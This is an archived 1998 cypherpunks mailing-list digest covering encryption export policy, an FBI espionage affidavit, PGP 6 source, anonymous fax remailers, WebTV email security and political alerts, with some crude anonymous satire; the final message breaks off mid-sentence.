The Digital Commerce Society of Boston


-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.5.5

iQEVAwUBNiYOVsUCGwxmWcHhAQFxUggAjVPIS2STdjusV7TZJd/VrrA9NOzw12al
9k9wFsEcWwvknad85QCiTY1Vkwa7hCakuH9YkU9BZlWLgNhpm0tBTZ/nkMjGRaaX
3V8d89CfjaXoMfxYEmL95Cm0HEND5hUFoSmlWPQUjvThcQwrbWzXubzsmPn0Jd7M
kqUrp/oFmqv4XYjgFWQxIz6va4dB772fTKCCmGJankNYh/ho+/HWm0pasymTzl/b
akPKYSnTgCNQrUqHy6zSJJiinrAWQkPYcEinWktnT/TJGU1DFuxciJzQhu1c1eVr
8xtkgPn86Rmz4HXKnLRRm+lTWOKAo6+IDR4N1vR38pCiHx4ySIQ+PQ==
=/Xht
-----END PGP SIGNATURE-----
-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'

For help on using this list (especially unsubscribing), send a message to
"dcsb-request@ai.mit.edu" with one line of text: "help".

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 16 Oct 1998 02:53:41 +0800
To: cypherpunks@toad.com
Subject: FBI Affidavit on Ex-NSA Cryptanalyst
Message-ID: <199810151821.OAA23576@dewdrop2.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



We offer the FBI's 23-page affidavit of charges against David
Sheldon Boone, ex-NSA cryptanalyst who allegedly
passed top secret SIGINT, EW and nuclear targeting plans 
to the Soviets:

   http://jya.com/dsb100998.htm

Tantalizing hints on means and methods, quoting the affidavit of the 
FBI agent in charge:

  On one occasion, "Igor" [Soviet agent] told BOONE that the 
  KGB/SVRR had access to United States Signals Directive 
  (USSID) Zero, which was an index of all other USSIDs, and 
  from this index IGOR asked BOONE to obtain specific USSIDs. 
  I have ascertained that USSIDs are classified NSA publications 
  for use in providing Signals Intelligence (SIGINT) support to 
  the United States military.

  BOONE told the OA [FBI Operational Asset posing as Soviet 
  agent to set up Boone] that he had given "Igor" a photocopy 
  of an NSA document entitled "United States Signals Intelligence 
  Directive (USSID) 514," dated May 6, 1988.  BOONE told the 
  OA that this USSID was unusual because it was one of few 
  USSIDs to be classified TOP SECRET rather than SECRET. 
  BOONE told the OA that USSID 514 was not widely 
  disseminated but that one copy had been at USAFS 
  Augsburg. 

And more on Boone's training and duties in cryptanalysis at
Fort Meade and in Germany.

Bad Ausburg is the location of one of the NSA intercept stations 
for the Echelon program is it not?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ernest Hua" <hua@teralogic-inc.com>
Date: Fri, 16 Oct 1998 06:40:04 +0800
To: <cypherpunks@toad.com>
Subject: =?iso-8859-1?Q?Re:_Commerce_Undersecretary_William_Reinsch_defends_the_go?==?iso-8859-1?Q?vernment=92s_encryption_policy_?=
Message-ID: <01bb01bdf886$f2f524a0$4164a8c0@mve21>
MIME-Version: 1.0
Content-Type: text/plain



Michael,

Absolutely!  But I still really am hoping in desperation that some
people in the main stream press would get a clue that this is all
double speak, and that they are simply playing a game to buy time
for their old system, and buy political wins for the next system.

Heck, if I was in FBI/NSA's shoes, and this was the slimy game I
see everyday in D.C., it would be the same game I play to get what
I need.  And I would be very irresponsible if I did not play the
game, however slimy it is.

The problem is that it seems like most of the public take speeches
like the speakers are pretty much honest, when in fact, most of
the time, they are playing spin control.

I have no doubt the FBI/NSA are in trouble.  Echelon (or whatever
they call it) is in trouble.  They are irresponsible if they did
not fight to the end to preserve some of their multi-billion $$$
investment, but they are in dire straits if they are hoping for a
second generation centralized scanning intelligence machinery like
Echelon.  My belief is that they have to gather automated
intelligence from far more disparate and heterogenous (and
possibly conflicting) sources in the near future, and find ways to
make sense out of all of the data.

But I think the intelligent observer would see that they have no
choice because this technology .. I hate that word because people
call some of the most simple and dumb stuff "technology" in order
to make money from it .. this technology is impossible to control,
which means that precisely the most important target worth going
after will have plenty of resources to foil Echelon, but the
people made most vulnerable (because of the regulations) are the
common folks.

THAT is what is pissing me off.  If they have some effective way
to regulate underground trade of encryption, then they would have
a story to tell.  However, the fact that most encryption get out
of this country so darn fast (we're counting minutes now ...)
means they are not even trying.  Prosecuting that guy in San Jose
is just nuts.  Since when does prosecuting a legitimate business
man will actually stop people, who firmly believing that they
have some natural right to distribute encryption?

And I must emphasize that my opinion has NOTHING to do with
whether encryption SHOULD, from a social/political/legal view, be
exportable or not.

Ern





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Max Inux <maxinux@openpgp.net>
Date: Fri, 16 Oct 1998 07:28:53 +0800
To: Steve Mynott <stevem@tightrope.demon.co.uk>
Subject: Re: pgp 6 src out
In-Reply-To: <19981015104621.A7198@tightrope.demon.co.uk>
Message-ID: <Pine.LNX.4.02.9810151602030.12167-100000@khercs.chipware.net>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, 15 Oct 1998, Steve Mynott wrote:
>hmmm pgp 6 source books have been released .. I wonder if there will
>be a pgp 6i unix version now?
>
>-- 
>1024/D9C69DF9 steve mynott steve@tightrope.demon.co.uk http://www.pineal.com/
>
>    i was gratified to be able to answer promptly, and i did.  i said i
>didn't know.  -- mark twain
>
The source is out, in book form atleast, available from Printers Inc.
waiting for it to be scanned.. It says on a web page i saw somewhere that
they will make a 6.0 for unix.  I think it was on NAI's page...

Max

--   Max Inux <maxinux@openpgp.net>  Hey Christy!!! KeyID 0x8907E9E5
Kinky Sex makes the world go round O R Strong crypto makes the world safe
       If crypto is outlawed only outlaws will have crypto
Fingerprint(Photo Also): 259D 59F7 D98C CD73 1ACD 54Ea 6C43 4877 8907 E9E5






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Thu, 15 Oct 1998 22:43:25 +0800
To: cypherpunks@cyberpass.net
Subject: No Subject
Message-ID: <199810151408.QAA03975@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



>From Springfield porkmarked 9 October 1998:

Subject: Virtual Heist -- FPP #6

"I put Six Million into Hog Futures first thing this
morning." Yesterday's Power Suit told his lunch 
companion, hoping to impress her.

"Silicon Valley." Today's Power Skirt replied, almost
leaning over to whisper, as if speaking loud
enough for the Differently Dressed Deviate at the next
table to hear would make E.F. Hutton roll over
in His or Her grave.

"That's where the Smart Money's going again."
she continued, glancing nervously at the Differently
Dressed Deviate whose Well-Tailored Suit seemed so
out of place and ... well, Threatening ... in this
Chicago Mercantile Exchange Lunch Room.

Today's Power Skirt crossed her legs and casually
admired her new Rolex as she told Yesterday's Power
Suit, with a hint of disdain in her voice, "I just
put *Twenty-Six Million Dollars* into ..."

"Everybody Freeze!" screamed the Differently
Dressed Deviate as i jumped to His or Her feet,
pulling a Digital Uzi out of His or Her Well-Tailored
Suit, which was a Cammo Montage of Colors
Weaves & Cuts of the Power Suits of a wide span
of Time & Generations.

"Army of Dog!" Cammo Monty continued,
sending a Shiver of Terror down the spines of
the Lunch Crowd gathered today, as they were
everyday, discussing (over their bag lunches)
their movement of Other People's Millions into and
out of various Money Market Accounts, et al.

Cammo Monty pointed the Digital Uzi at the
breast pocket of Yesterday's Power suit.
"Let's see your Bank Book, Dick Face."


Horrified, Yesterday's Power Suit shakily withdrew
the Bank Book from his pocket, opened it and placed
it on the table in front of him.

"Just over three hundred bucks." the Army
of Dog Digital Terrorist told the Lunch Crowd,
causing much chuckling and snickering
throughout the room.

"Let's have it, Twat Face." Cammo Monty
spun around pointing the Digital Uzi directly
at the Bank Book of Today's Power Skirt, as she
was trying to slip it out of her Briefcase, 
unnoticed.

Reluctantly, she opened it and lay it on
the table.

"A hundred and twenty-eight dollars ..." Cammo
Monty announced to the tittering Lunch Crowd, "and
seventeen cents." i finished to a chorus of guffaws.

Cammo Monty leapt onto his chair, and placed
one foot on the table, waving His or Her Digital
Uzi around the room, seeing the Fear (TM)
in the Eyes of each Wanna Be Money Kontroller in
the room - thinking that they might be the next
to have their finances exposed.

"Today's Power Skirt," Cammo Monty told the
Lunch Crowd, "bought her Rolex on a Payment Plan,"
a shudder went through the room, "with a *ten
percent*," i spit out the words as she began
to moan, "down-payment."

Today's Power skirt collapsed in tears ...

"You Fucking Morons (TM)!" Cammo Monty
screamed at the group, causing them to
cringe in shame.

"You are handling Other People's Money. It's
not *your* money, you idiots, so Wake The
Fuck Up (TM) and stop pretending that it is ... 
to yourself and to each other." <J <J

Across town, one of Cammo Monty's A0D
Non-Conspirators was making a similar
speech to a Lunch Crowd of Federal
BureauCraps.

"Sunshine is the best disinfectant." the Beautiful 
Army of Bitch Terrorist nagged the whimpering
BureauCraps, for the hundredth times, as i
laid yet another Digital Printout on the
Overhead Projector.

"This is the amount of National Debt that is
a result of you Fuck Wads holding meetings to
discuss the agendas of future meetings."
Beautiful Bitch snarled at the Group.

"This," i continued, slapping down a picture
of a Family With 2.5 Children onto the Overhead
Projector, "is who is *paying* for your
Incompetence & Departmental Squabbling."

"Don't look away!" the Beautiful Bitch screamed,
using the Zoom Feature to Highlite the Child with
no arms or legs in the picture.

"It's NOT YOUR MONEY you Dumb Assholes!" i
continued to nag at the BureauCraps. "But you're
not content to force the Taxpayers to pay
An Arm & A Leg to support your Wasteful Spending - 
now you want *Two Arms & Two Legs* ..."

"CHILDREN'S LEGS!" the Beautiful Bitch
raged at the terrified BureauCraps.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Thu, 15 Oct 1998 22:43:19 +0800
To: cypherpunks@cyberpass.net
Subject: No Subject
Message-ID: <199810151414.QAA04585@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



>From Springfield poxmarked 9 October 1998:

Subject: Springfield CypherPunks Physical Meeting
         FPP 10-5-98

Date:    Every Saturday thru Thursday (except when it
         rains)

Time:    During 'REC' Hour.

Place:   Recreation Cages/The Hole (TM)
         Nuthouse Number Nine
         Looney Level 'Leven
         Springfield, Missouri

Directions: Walk to the Cell Door. Turn around, squat 
down and put your hands behind you, and through the Slot 
In The Door. Stand up after Handcuffs are in place, turn
around and wait for Guard to open Door. Step into
hallway and wait for Pat-Down. (Smiling, Wisecracks & 
Hard-Ons not advised.) Follow first Inmate & Guard.

There will be a short period for everyone to cop a few
butts (cigarettes only, please), if they don't have
any, light them and Shoot the Shit or Settle Old Scores 
before the Speakers begin to Rant & Rave or Blather
Aimlessly.

              This Weeks Topics/Speakers

Saturday:  Where Are Everybody's Shoes?
           ~ MAY, T.C.

Sunday:    Does Anybody Remember What We Talked About
           Yesterday?
           ~ FroomNOSPAMkin, M.

Monday:    I *TOLD* You They (TM) Were Out To Get Us!
           ~ replay.com, N@

Tuesday:   If They're So Certain This Prison is Secure,
           Then Why Won't They Provide Us With Blue
           Prints?
           ~ Geiger, Wm III

Wednesday: This Isn't What I Had In Mind When I Helped
           Set the Prison Standards
           ~ Hallam-Baker, P.

           I'm Sure Glad I Put In A Side Door
           ~ Sameer, P.

           I Broke Out! (But I Can't Provide You With
           Any Details)
           ~ Zimmermann, P.

           How many Beatings Does It Take To Change A
           Prison Cell Light Bulb?
           ~ Costner, R.

           I Bet Bill Gates *Stole* Everyone's Shoes!
           ~ Hun, A.T.

           I *Love* This Prison!
           ~ Hettinga, R.

Thursday:  Prisoner #7-9-12-13-15-18-5, J. is a COCK
           SUCKER!
           ~ Warden Vulis, D. (KOTM)

                 (DON'T FORGET YOUR SHOES!)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: HyperReal-Anon <nobody@sind.hyperreal.art.pl>
Date: Fri, 16 Oct 1998 02:15:57 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Commerce Undersecretary William Reinsch defends the government's encryption policy
Message-ID: <d14df17322bf86d6d2ecc4292290423e@anonymous>
MIME-Version: 1.0
Content-Type: text/plain



nospam@freedom.net wrote:
> 
> http://www.infosecuritymag.com/sept/q%26a.htm
> Q & A WITH WILLIAM REINSCH
>
> Reinsch: What the government has also said is that if it's a 
> key-recovery product, it can be exported with any bit length 
> without constraint. And that's what we would prefer to focus 
> on -- to tell people, if you're product has recovery features, 
> bit length doesn't matter.

Ah, something we can finally agree upon:
"if your product has recovery features, bit length doesn't matter" 
(it's insecure).





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Fri, 16 Oct 1998 07:55:40 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: mail2fax remailer capability? (fwd)
Message-ID: <199810152339.SAA18878@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Thu, 15 Oct 1998 20:14:40 +0100
> From: Adam Back <aba@dcs.ex.ac.uk>
> Subject: mail2fax remailer capability?

> Has anyone come across any mail2fax site which tries to keep track of
> other free fax services and forward faxes to one in the right area?

It wouldn't surprise me any to find that Kinko's and other such chain print
shops couldn't do that sort of thing. Now if they'd do it over the web....

> ('Course if we could get some damn working ecash, we could fax it
> anywhere -- sender pays:-)

Open a laundromat, at least one person here in Austin has begun providing
smart-card/no cash services.

> Next stage -- anonymous voice mail delivered via voice modem /
> soundcard, all via mixmaster, that would be nice!

An anonymous remailer which drove a multi-format/media database would be
pretty nifty. Might find more than a few niche markets to dabble in as well.
In a sense you'd have your own little one machine data-haven.


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Fri, 16 Oct 1998 04:01:02 +0800
To: remailer-operators@anon.lcs.mit.edu
Subject: mail2fax remailer capability?
Message-ID: <199810151914.UAA08343@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




I am noticing the odd free email2fax "your fax was sent successfully"
report in the dud messages sent to (the non-replyable)
nobody@remailer.ch.

Warming to the heart that -- anonymous fax.

Now I am wondering what the coverage is like on fax gateways -- it
clearly only is going to work in places where there are free local
calls, for numbers counting as local to the gateway.

Just thinking it would be kind of nice if one could send a message

To: +1.234.567.891-mail2fax@anon.lcs.mit.edu

via mixmaster and have it sort out the delivery if possible to
mail2fax gateways operating with local calls in that area code.
(Analogously perhaps to the auto USENET posting from those remailers
with this option turned on -- that is either direct (remailer posts)
or indirect (forwarded to a mail2news gateway)).

Has anyone come across any mail2fax site which tries to keep track of
other free fax services and forward faxes to one in the right area?

('Course if we could get some damn working ecash, we could fax it
anywhere -- sender pays:-)

Next stage -- anonymous voice mail delivered via voice modem /
soundcard, all via mixmaster, that would be nice!

Adam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Fri, 16 Oct 1998 10:16:51 +0800
To: cypherpunks@cyberpass.net
Subject: RE: FYI: More on WebTV security
Message-ID: <v04020a51b24c4b244dc8@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


From: Pablo Calamera <pablo@microsoft.com>
To: "'dstoler@globalpac.com'" <dstoler@globalpac.com>, rah@shipwright.com,
        mac-crypto@vmeng.com
Cc: jimg@mentat.com
Subject: RE: FYI: More on WebTV security
Date: Thu, 15 Oct 1998 17:19:11 -0700

comments inserted, extraneous text deleted.

> -----Original Message-----
> From: dstoler@globalpac.com [mailto:dstoler@globalpac.com]
> Sent: Tuesday, October 13, 1998 5:39 AM
> To: Pablo Calamera; rah@shipwright.com; mac-crypto@vmeng.com
> Cc: jimg@mentat.com
> Subject: Re: FYI: More on WebTV security
>
> [stuff deleted]
> The press release implies that there is secure end-to-end
> email between two WebTV customers.

The wording is somewhat ambiguous though it does have more of a bent on the
security of the transport layer.  Perhaps it could have been clearer and
specifically said that messages where encrypted during transport using 128
bit encryption.

> Perhaps I am overly cynical, but I am guessing that they are
> using SSL (TLS) from a web based email application on the
> client to WebTV's servers. I presume email data is decrypted
> at the servers, then re-encrypted to the recipient when she
> uses the WebTV client to read email.

Close.  We could not even export SSL (TLS) with 128 encryption in this
scenario.  We have a proprietary transport protocol that we use that employs
128 bit RC4.

> This approach would allow access to private email at the
> servers by WebTV employees or law enforcement agencies.
>
> Note the careful use of the phrases "unauthorized party" and
> "without posing undo risks to national security and law
> enforcement" in the press release.
>
> I believe that WebTV's email security is directly coupled to
> their ability to establish and enforce good security policy
> within their operation and the trustworthiness of the
> employees who have access to sensitive data.

Partially true. We believe a major component of our security is indeed in
the encrypted transport of your email from the service through the internet,
through a leased POP to your box.  Our Privacy Policy and Terms of Service
are available for your viewing.
  http://webtv.net/home/privacy_text.html
  http://webtv.net/home/tos_text2.html

This level of protection goes beyond email to registration,
preferences/setup, "favorites" etc...  Virtually all communications with the
WebTV service.

> I am concerned that carefully constructed wording of
> Microsoft's press release implies stronger email security
> than really exists. I hope I am wrong.

We believe that with the level of encryption and the quality of our network
operations that we have the best level of privacy protection for our users
of any online service.  I agree that the carefully worded press release may
imply more than what we got.  But we are very happy with this initial step.
It has taken a very long time just to get export approval for this
architecture and we look forward to further relaxation of export controls so
we can compete on even footing with our foreign competitors.

Pablo

> David Stoler
>
>
> Key paragraphs from Microsoft's press release:
>
> WebTV Networks has been granted the first export license to
> use strong 128-bit encryption for any user and any
> application in Japan and the United Kingdom. So, for example,
> an e-mail message with personal information sent from a WebTV
> subscriber in Japan to a second WebTV subscriber in Japan
> will be sent securely because there is no known technology by
> which an unauthorized party could intercept and decipher it.
>
> Therefore, as part of the WebTV Network, the WebTV-based
> Internet terminal (starting at under $100) is now the most
> secure communications device available from a U.S. company.
>
> "WebTV Networks' export approval is a significant step for
> industry and reflects the U.S. government's commitment to
> promoting e-commerce abroad," said William Reinsch, U.S.
> undersecretary for export administration. "The WebTV Network
> provides secure communications for its customers and partners
> without posing undue risks to national security and law enforcement."
>
>
>

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mohammed Lazhar" <Mohammed_Lazhar@cch-lis.com>
Date: Fri, 16 Oct 1998 09:55:46 +0800
To: Secret_Squirrel_ <squirrel7@nym.alias.net>
Subject: Re: wtf...
Message-ID: <8525669F.0005D1D4.00@notes.cch-lis.com>
MIME-Version: 1.0
Content-Type: text/plain



hey Guys :
   I just subscribed to the list. I will be posting stuff soon
   Mohammed





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Edwin E. Smith" <edsmith@IntNet.net>
Date: Fri, 16 Oct 1998 10:40:04 +0800
To: "Mohammed Lazhar" <Mohammed_Lazhar@cch-lis.com>
Subject: Re: wtf...
In-Reply-To: <8525669F.0005D1D4.00@notes.cch-lis.com>
Message-ID: <3.0.2.32.19981015221032.007e2100@mailhost.IntNet.net>
MIME-Version: 1.0
Content-Type: text/plain



Thanks fot the warning.

At 09:05 PM 10/15/98 -0400, you wrote:
>hey Guys :
>   I just subscribed to the list. I will be posting stuff soon
>   Mohammed
>
>
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Edwin E. Smith" <edsmith@IntNet.net>
Date: Fri, 16 Oct 1998 10:38:07 +0800
To: cypherpunks@toad.com
Subject: wtf...
Message-ID: <3.0.2.32.19981015221350.007ef5a0@mailhost.IntNet.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Let's talk.



- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGP for Personal Privacy 5.0

mQGiBDPJm3oRBADUlbn8EX/UCyp3+lwiO8ZQLdG2QXQ8EdZ8+qOffbi5KKun3RVz
4XfU77cK+HWUeYfuVBZm1/8Uwbz/I1Z/FVUgDktMDvg4oeBnVBMBM8r4TPC8H73j
0B+XE6H5U8teixXljQpVsusTygI5R8LJ9Q9XNN9eWW1rxEYk2wG0I/3Z4wCg/+7N
X6ayuKoJe8uVRro4USMVsycEAMiF1Kn1HevS2CaQn70xAYfk3/xGYjIj54hhlYQ+
zgvLuBMnfI3FoC875OyFhXUReIIn2HcdZKNcYrM1q33fgmMESZnjGr48qNe3rh4G
FvhUHKkN6tOK/L8mCtbs6LAarjR2kE+nYmS2CcYeuhbfnj3O/wQqhsA8i4HCdsDK
iHxXA/9aSIRFlB4ImAgDI6CywtCfMkQUdau0d2D+0p/XNtPf+r2kt8s6haeCgseB
IQNETTC7PNf9ME0hpBGx2NdVsxsBvinASmkqJpE/yNUrSbzfmrkDf6OstfwtDeum
NnF2E98KX+sHm9gCwTogSeXRQfwnZgIUEHgupNcTCm2hIF8JY7QjRWR3aW4gRS4g
U21pdGggPGVkc21pdGhASW50TmV0Lm5ldD6JAEsEEBECAAsFAjPJm3oECwMBAgAK
CRBJjX+m+ejwLU30AJ0chm6vMGZkSEk8R9Ci2YFbjqj8gACgtfRQLBfyEDLdQ5A6
O7U7VxpxDsGJAD8DBRA0geyVJnBGgNW85eURAnHAAJ9zOR8Z2uLjFdUfcTYfsDHg
y7LdRACg3J/LLskk+f7psHBHUTIGlooTsyq5Ag0EM8mbexAIAPZCV7cIfwgXcqK6
1qlC8wXo+VMROU+28W65Szgg2gGnVqMU6Y9AVfPQB8bLQ6mUrfdMZIZJ+AyDvWXp
F9Sh01D49Vlf3HZSTz09jdvOmeFXklnN/biudE/F/Ha8g8VHMGHOfMlm/xX5u/2R
XscBqtNbno2gpXI61Brwv0YAWCvl9Ij9WE5J280gtJ3kkQc2azNsOA1FHQ98iLMc
fFstjvbzySPAQ/ClWxiNjrtVjLhdONM0/XwXV0OjHRhs3jMhLLUq/zzhsSlAGBGN
fISnCnLWhsQDGcgHKXrKlQzZlp+r0ApQmwJG0wg9ZqRdQZ+cfL2JSyIZJrqrol7D
VekyCzsAAgIH/3SLvO37hk+J1SI6NgYjpivzyMD2E2acTVdpDWILSmlfVrTmoZ9b
t+7jPj5cV5gAVD706Rv3h8Je1FsqtnqkV61z1ncx7cmU1gJTrecoLYBXbXbFk613
evI+u9EV1s3BGW4W4FsWp9ljQ1iR5Pb6TkTgeQ1SwI4uTCTkfYO1LvE/Boq1Nh7y
6ZoVBzrf8jvliHAsGw4sEQOtttfKr1SOPwweop6ZfEe4mLDHsNSSobKWU/Ql+JZD
cr26Vm+C2tyBpAlYtuKj8WouLOUTa1bOo1LtClD1rgBmsao+8I1K1BfjiNlb+lS1
o8yxwoRjARKqGzrGoCB3x5mri6bHPdkQMWGJAD8DBRgzyZt7SY1/pvno8C0RAsdu
AJ9mc0T8wq8viIy+uuFmG/6w1xiMhACg6h1fCtucX3tOAVLKIUgEmss7AJE=
=U2JQ
- -----END PGP PUBLIC KEY BLOCK-----



At 11:27 PM 10/15/98 -0000, you wrote:
>Has this list server died or is it just me?
>
>it seems like the list has died or is it just slowly fading into 
oblivion? It seems as though the only people still posting come from 
some great spam factory in left field. Have all of the questions been 
answered? Is everyone happy with the encryption they have? Doesn't 
anyone have any new thoughts on export restrictions, hash 
implementations, or the like? I know that I'm still out here, is 
anyone else?
>
>Does this ring a bell? 
>People must come and together deploy these systems for the common 
good.  Privacy only extends so far as the cooperation of one's 
fellows in society.  We the Cypherpunks seek your questions and your 
concerns and hope we may engage you so that we do not deceive 
ourselves.  We will not, however, be moved out of our course because 
some may disagree with our goals.
>
>Who else is out there?
>
>
-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv

iQA/AwUBNiaSoEmNf6b56PAtEQKOhQCeJchkyv48Ksi+0L+YIKEpv21wHqQAoIwl
cK9lvW97mHZmM0aDwzi/IC6l
=fUQ7
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex de Joode <usura@replay.com>
Date: Fri, 16 Oct 1998 04:48:15 +0800
To: aba@dcs.ex.ac.uk (Adam Back)
Subject: Re: mail2fax remailer capability?
In-Reply-To: <199810151914.UAA08343@server.eternity.org>
Message-ID: <199810152017.WAA08543@replay.com>
MIME-Version: 1.0
Content-Type: text



www.tpc.int

> 
> 
> I am noticing the odd free email2fax "your fax was sent successfully"
> report in the dud messages sent to (the non-replyable)
> nobody@remailer.ch.
> 
> Warming to the heart that -- anonymous fax.
> 
> Now I am wondering what the coverage is like on fax gateways -- it
> clearly only is going to work in places where there are free local
> calls, for numbers counting as local to the gateway.
> 
> Just thinking it would be kind of nice if one could send a message
> 
> To: +1.234.567.891-mail2fax@anon.lcs.mit.edu
> 
> via mixmaster and have it sort out the delivery if possible to
> mail2fax gateways operating with local calls in that area code.
> (Analogously perhaps to the auto USENET posting from those remailers
> with this option turned on -- that is either direct (remailer posts)
> or indirect (forwarded to a mail2news gateway)).
> 
> Has anyone come across any mail2fax site which tries to keep track of
> other free fax services and forward faxes to one in the right area?
> 
> ('Course if we could get some damn working ecash, we could fax it
> anywhere -- sender pays:-)
> 
> Next stage -- anonymous voice mail delivered via voice modem /
> soundcard, all via mixmaster, that would be nice!
> 
> Adam
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 16 Oct 1998 14:01:01 +0800
To: cypherpunks@cyberpass.net
Subject: IP: ** National ID Alert - Again **
Message-ID: <199810160538.WAA28778@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: Patrick Poole <ppoole@fcref.org>
Subject: IP: ** National ID Alert - Again **
Date: Thu, 15 Oct 1998 12:08:54 -0400
To: ignition-point@majordomo.pobox.com

We have been made aware by concerned staff members on the Hill that the
one-year moratorium on implementing the National ID regulations is once
again under attack from Rep. Lamar Smith. Not more than a week ago we
sent out a similar alert after Smith was successful in convincing
Speaker Gingrich to remove the provision from the bill. After our alert,
many of you called Speaker Gingrich and told him "No to the National
ID". Because of your prompt action and phone calls, he was forced to
back down and allow the moratorium provision in the Omnibus
Appropriations Act for FY99. 

Now, in the waning hours of the 105th Congress, Gingrich is wavering on
the issue and considering pulling the one-year moratorium from the bill
at Smith's request. We need your help to stop Lamar Smith's stealth
attacks on our freedoms by calling his office and Speaker Gingrich and
telling them both, "No National ID for the American people!" The bill
will probably come to a vote in the House TODAY. IT IS IMPERATIVE THAT
YOU * CALL * THEIR OFFICES. With all of the last minute legislative
activity occurring today, a phone call will be the only way that your
voice is heard on this matter.

Lamar Smith 		202/225-4236
Speaker Gingrich 	202/225-0600 

Thanks in advance for your prompt attention. 

Patrick Poole
Coalition for Constitutional Liberties
Free Congress Foundation




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 16 Oct 1998 13:59:47 +0800
To: cypherpunks@cyberpass.net
Subject: IP: HOUSE APPROVES Y2K BILL
Message-ID: <199810160538.WAA28791@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: "Peter J. Celano" <celano@ic.net>
Subject: IP: HOUSE APPROVES Y2K BILL
Date: Thu, 15 Oct 1998 13:24:30 -0400
To: ignition-point@majordomo.pobox.com

HOUSE APPROVES Y2K BILL

 The U.S. House of Representative has voted
407-3 to authorize the president's Council on the Year 2000
Conversion to take control of computer systems of critical agencies
if they're unlikely to be able to avert a crisis because of the Year
2000 software problem, in which old programs using 2-digit codes for
years will be unable to do correct date-based calculations.  The
Senate has not yet voted on the measure.  (AP 13 Oct 98) 




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 16 Oct 1998 14:00:04 +0800
To: cypherpunks@cyberpass.net
Subject: IP: ISP not liable for customer's messages
Message-ID: <199810160538.WAA28804@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: "Peter J. Celano" <celano@ic.net>
Subject: IP: ISP not liable for customer's messages
Date: Thu, 15 Oct 1998 13:25:31 -0400
To: ignition-point@majordomo.pobox.com

INTERNET PROVIDER NOT LIABLE FOR MESSAGES OF ITS CUSTOMERS

An appeals court in Florida has ruled against a woman who sued 
America Online because one of its customers, a convicted sex 
offender, used an AOL chat group to try to sell the woman's 
11-year-old son a pornographic video. The court said that federal law 
protects online services from being held liable for the messages 
transmitted by their members sell the videotape of the boy. The 
defeated lawsuit, which is being appealed to the Supreme Court, tried 
to characterize America Online as "a home shopping network for 
